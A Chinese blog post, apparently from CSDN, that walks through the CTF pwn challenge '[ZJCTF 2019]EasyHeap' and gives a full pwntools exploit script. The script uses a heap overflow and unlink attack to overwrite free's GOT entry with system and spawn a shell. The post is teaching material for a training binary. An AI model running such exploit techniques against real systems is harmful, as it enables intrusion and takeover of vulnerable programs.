[ZJCTF 2019]EasyHeap

最新推荐文章于 2024-01-25 22:37:14 发布
最新推荐文章于 2024-01-25 22:37:14 发布
阅读量1.9k 收藏 9
点赞数 5
分类专栏: BUU-PWN 文章标签: pwn wp 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121961600
版权
该博客详细介绍了如何利用[CTF]比赛中的一道题目,该题目涉及到堆溢出和未初始化的堆指针。通过关闭的PIE保护,作者通过构造fake_chunk来影响堆布局,进而修改free的GOT表,最终实现通过free调用system('/bin/sh')获取shell。整个过程包括创建、编辑和释放堆块,以及构造payload来操纵内存地址。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[ZJCTF 2019]EasyHeap

使用checksec查看:
在这里插入图片描述
一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell

拉进IDA中查看:

标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了,

先来看看create_heap():
在这里插入图片描述

  • heaparray[i]:存放 chunk 的地址。
  • read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。
  • heaparray是存放在bss段上的

edit_heap():
在这里插入图片描述
read_input(heaparray[v2], v0);

  • read_input(heaparray[v2], v0):向 chunk 中写入 v0 大小的内容,也就是说如果 v0 比 create 时的 size 大的话就会造成堆溢出。

delete_heap():
在这里插入图片描述

free(heaparray[v1]);
heaparray[v1] = 0LL;
  • free(heaparray[v1]); free 掉对应 chunk
  • heaparray[v1] = 0LL; 将指针置 0 。
  • 不存在UFA

值得一提的是这道题目还有个函数:l33t():
在这里插入图片描述
这个函数直接能返回flag,但是实际上并不存在这个目录:
在这里插入图片描述
OK,回到题目上来,指针被清空了,UAF啥的就用不了了,但是可以注意到的是,存在堆溢出,且堆是放在bss段上的

最先想到的便是unlink,PIE保护也没有开启,正好可以修改free的got表.

首先针对每个函数写出对应的函数:

def add(size,content):
    r.recvuntil("Your choice :")
    r.sendline('1')
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap:")
    r.sendline(content)

def edit(idx, size, content):
    r.recvuntil("Your choice :")
    r.sendline('2')
    r.recvuntil("Index :")
    r.sendline(str(idx))
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap : ")
    r.sendline(content)

def delete(idx):
    r.recvuntil("Your choice :")
    r.sendline('3')
    r.recvuntil("Index :")
    r.sendline(str(idx))

获取到堆在BSS段上的地址:heaparray_addr = 0x6020E0

开始调试:

首先创建三个chunk:

add(0x90,b"MMMM")#0
add(0x90,b"MMMM")#1
add(0x20,b"/bin/sh\x00")#2

编辑chunk0构造出一个fake_chunk,方便chunk1 free的时候进行合并,

fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,b'M')
fake_chunk += p64(0x90) + p64(0xa0)

伪造好之后堆布局如下:
在这里插入图片描述
这时,free掉chunk1,chunk1就会和前面伪造的fake_chunk进行合并,合并完之后堆空间如下:
在这里插入图片描述
此时编辑chunk0就是编辑heaparray_addr-0x18,原本heaparray_addr所指向的是正常的堆地址,此时可以改为free_got的地址,修改完成之后我们编辑chunk0就是编辑free_got的地址,如果将free_got修改成system_plt,在我们执行free的时候执行的就是system:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
chunk2处已经写入了/bin/sh,此时freechunk2便是system('/bin/sh')

完整exp如下:

from pwn import *

#start
r = process("../buu/[ZJCTF 2019]EasyHeap")
# r = remote("node4.buuoj.cn",28658)
elf = ELF("../buu/[ZJCTF 2019]EasyHeap")

context.log_level = 'debug'
#gdb.attach(r,"b* 0x400930")

def add(size,content):
    r.recvuntil("Your choice :")
    r.sendline('1')
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap:")
    r.sendline(content)

def edit(idx, size, content):
    r.recvuntil("Your choice :")
    r.sendline('2')
    r.recvuntil("Index :")
    r.sendline(str(idx))
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap : ")
    r.sendline(content)

def delete(idx):
    r.recvuntil("Your choice :")
    r.sendline('3')
    r.recvuntil("Index :")
    r.sendline(str(idx))

#params
heaparray_addr = 0x6020E0
system_plt = elf.plt['system']
free_got = elf.got['free']

#attack
add(0x90,b"MMMM")#0
add(0x90,b"MMMM")#1
add(0x20,b"/bin/sh\x00")#2


fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,b'M')
fake_chunk += p64(0x90) + p64(0xa0)

edit(0,0x100,fake_chunk)
delete(1)

# gdb.attach(sh,"b* 0x400930")

payload = p64(0)*3 +p64(free_got)
edit(0,0x20 ,payload)
edit(0,8,p64(system_plt))
delete(2)

r.interactive()
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 739
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2922
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 1065
经典堆菜单。
ZJCTF2019EasyHeap
03-27
题目描述 请使用C++实现一个简单的堆,完成以下操作: 1.插入一个元素 2.删除堆顶元素 3.输出堆中元素的个数 4.输出堆中所有元素 ...2.堆中每个节点的值都大于等于其左右子节点的值;...C++ 代码
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 864
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 1061
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
[ZJCTF 2019]EasyHeap-patchlibc-调试
个人笔记
04-25 693
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18。heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];1、伪造chunk[2]=[全局地址-3];chunk[3] = [全局地址-2]通过修改chunk[3]的值 ->控制 &chunk[0] ->4、给任意地址填入内容,chunk[0] = [任意内容]3、填入控制任意地址,chunk[3] = [任意地址]chunk[3] ->实现[任意地址]写。
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 1033
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 354
BUUCTF 做题练习
heap2-[ZJCTF 2019]EasyHeap
qq_51687381的博客
07-27 233
做题先check找攻击手段,Partial RELRP ->修改got表 菜单题,直接找准delete看看有没有UAF。 UAF未果。 但是在Edit_heap中存在漏洞。 这里看起来是以为可以修改heap的size,其实这个size是用来对你的输入进行限制的。(栈溢出就在这里把size写的很大,方便我们写入) 而且这个程序写的也有点问题。 它会让你修改chunk的信息域 所以 wp from pwn import * sh = remote("node4....
[ZJCTF 2019]EasyHeap-house of spirit
huzai9527的博客
03-15 280
[ZJCTF 2019]EasyHeap-house of spirit 先给出exp,exp中我标明了每一个步骤 每个步骤执行完后,内存中的地址空间我也贴出来了 exp from pwn import * p = remote('node3.buuoj.cn',29012) #p = process('./easyheap') context.log_level = 'debug' def creat(size,content): p.sendlineafter('Your choice :',st
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 2078
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
pwn入门堆题[ZJCTF 2019]EasyHeap
最新发布
m0_73575406的博客
01-25 716
buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)。
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 569
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值